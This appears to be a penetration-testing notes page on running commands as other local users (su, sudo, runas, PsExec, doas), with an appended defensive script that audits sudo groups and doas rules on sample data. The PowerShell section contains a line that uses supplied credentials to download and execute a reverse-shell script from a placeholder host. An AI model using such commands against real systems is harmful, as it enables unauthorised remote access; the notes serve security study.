Hacking Notes
Run Commands AS

Sometimes we need to move laterally or vertically on the same host by switching between local users, without being able to use any authenticated service such as SMB or SSH.

Last updated 3 years ago

Linux

On Linux the easiest way to switch between users is the su command:

su user

To change to the root user (you need to be in the sudoers group):

sudo su -

Windows

Cmd

The runas command gives us the opportunity, from cmd, to run commands as other users:

runas /user:username <program>
runas /user:domain\username <program>
runas /user:username@domain <program>

PsExec

PsExec is part of a growing kit of Sysinternals command-line tools, named PsTools, that aid in the administration of local and remote systems.

psexec.exe /accepteula
psexec.exe [\\COMPUTER] /u USER /p PASS cmd [args]

Powershell

$user='WORKGROUP\User'; 
$pass='passwd';
Invoke-Command -ScriptBlock { iex(New-Object Net.WebClient).DownloadString('http://<IP>:<PORT>/rev_shell.ps1') } -ComputerName BART -Credential (New-Object System.Management.Automation.PSCredential $user,(ConvertTo-SecureString $pass -AsPlainText -Force))

NetBSD

Switching users works like on Linux:

su user

Similar to sudo, to change to the root user:

doas -u USER sh
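As an added example that is not part of the original notes, the POSIX shell script below takes the defender's view of the two Unix routes to root shown above: membership of the groups that make `sudo su -` possible on Linux, and doas rules that run as root on NetBSD. It audits a group(5) file and a doas.conf(5) file and lists every account or rule that reaches root. The file contents, user names and group ids are constructed sample data, not taken from any real host; on a real system you would pass `/etc/group` and `/etc/doas.conf` instead.

```shell
#!/bin/sh
# Added example (not from the original notes): audit which local accounts can
# switch to root via sudo/wheel group membership (Linux) or doas rules (NetBSD).

# Print "group:member" for every member of the groups that typically grant
# "sudo su -" (sudo on Debian-style systems, wheel on BSD/RHEL-style ones).
# $1: path to a group(5)-format file
sudo_group_members() {
    awk -F: '$1 == "sudo" || $1 == "wheel" {
        n = split($4, m, ",")
        for (i = 1; i <= n; i++) if (m[i] != "") print $1 ":" m[i]
    }' "$1"
}

# Print every doas "permit" rule whose target user is root. doas(1) defaults
# to root when the rule has no "as" clause, so such rules are reported too.
# $1: path to a doas.conf(5)-format file
doas_root_rules() {
    grep -v '^[[:space:]]*#' "$1" | grep -E '^[[:space:]]*permit' | awk '
        {
            target = "root"   # implicit target when "as" is absent
            for (i = 1; i <= NF; i++) if ($i == "as") target = $(i + 1)
            if (target == "root") print
        }'
}

# Constructed sample input files (labelled sample data, not from a real host).
TMP=$(mktemp -d)
trap 'rm -rf "$TMP"' EXIT

cat > "$TMP/group" <<'EOF'
root:x:0:
wheel:x:10:alice
sudo:x:27:bob,carol
users:x:100:alice,bob,carol,dave
EOF

cat > "$TMP/doas.conf" <<'EOF'
# who may run what as root
permit persist alice as root
permit nopass :wheel cmd reboot
permit dave as postgres
permit carol
EOF

echo "== accounts in sudo/wheel =="
sudo_group_members "$TMP/group"
echo "== doas rules that reach root =="
doas_root_rules "$TMP/doas.conf"
```

On the sample data the first function reports alice (wheel), bob and carol (sudo); the second reports three rules, because `permit dave as postgres` targets a non-root account and is skipped while `permit carol` targets root implicitly.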